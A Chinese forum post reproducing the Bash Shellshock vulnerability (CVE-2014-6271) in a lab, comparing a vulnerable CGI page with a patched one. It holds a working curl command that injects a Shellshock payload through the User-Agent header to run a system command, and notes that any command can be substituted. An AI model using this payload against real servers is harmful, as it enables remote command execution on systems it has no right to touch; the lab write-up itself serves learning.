登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
博客
发1篇日志+1圆
记录
发1条记录+2圆币
发帖说明
VIP申请
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
VIP申请
VIP网盘
网盘
联系我们
道具
勋章
任务
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
安全
›
CVE-2014-6271 Bash破壳漏洞Shellshock (复现)
CVE-2014-6271 Bash破壳漏洞Shellshock (复现)
[ 复制链接 ]
呈步
2025-7-29 17:44:04
服务启动后,通过浏览器或命令行访问以下两个页面,确认服务已正常运行:
存在漏洞的页面(基于 bash4.3):http://your-ip:8080/victim.cgi
修复后的页面(基于最新版 bash):http://your-ip:8080/safe.cgi
执行curl -H "User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id" http://192.168.75.132:8080/victim.cgi命令
发送 HTTP 请求,在User-Agent头中注入 Payload
Payload 说明:
() { foo; }; 是为了绕过 bash 的函数定义检查,后面的echo Content-Type: text/plain; echo; /usr/bin/id会被漏洞 bash 执行,其中:
echo Content-Type: text/plain; echo; 用于正确输出 HTTP 响应头
/usr/bin/id 是要执行的系统命令(可替换为其他命令,如/bin/ls等)
观察结果
访问victim.cgi时,命令会被成功执行,返回id命令的结果(如用户 UID、GID 等信息),说明漏洞存在。
访问safe.cgi时,相同的 Payload 不会被执行,只会返回正常页面内容,说明修复有效
这里返回id命令,漏洞利用成功!
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
CVE
2014
6271
Bash
破壳
相关帖子
bash是什么语言
Vite CVE-2025-30208 安全漏洞
NextJS CVE-2025-29927 安全漏洞
Vulnhub-Source-1(CVE-2019-15107)
CVE-2025-29927 Next.js 中间件权限绕过漏洞复现
AD 提权-CVE-2022-26923: CertiFried
Bash和Zsh中read命令的使用区别
CVE-2018-8715 AppWeb认证绕过漏洞 (复现)
vip免费申请,1年只需15美金$
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
教程
bash是什么语言
0
95
新程序
2025-05-23
业界
Vite CVE-2025-30208 安全漏洞
0
663
梳踟希
2025-06-03
业界
NextJS CVE-2025-29927 安全漏洞
0
670
钿稳铆
2025-06-03
业界
Vulnhub-Source-1(CVE-2019-15107)
0
596
各卧唯
2025-06-04
科技
CVE-2025-29927 Next.js 中间件权限绕过漏洞复现
0
459
仲秀娟
2025-06-07
业界
AD 提权-CVE-2022-26923: CertiFried
0
766
卢莹洁
2025-06-07
安全
Bash和Zsh中read命令的使用区别
0
716
袂沐
2025-06-09
安全
CVE-2018-8715 AppWeb认证绕过漏洞 (复现)
0
448
左优扬
2025-07-29
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
浏览过的版块
业界
签约作者
程序园优秀签约作者
发帖
呈步
2025-7-29 17:44:04
关注
0
粉丝关注
12
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
敖可
9984
黎瑞芝
9990
杭环
9988
4
凶契帽
9988
5
氛疵
9988
6
猷咎
9986
7
里豳朝
9986
8
肿圬后
9986
9
蝓俟佐
9984
10
虽裘侪
9984
查看更多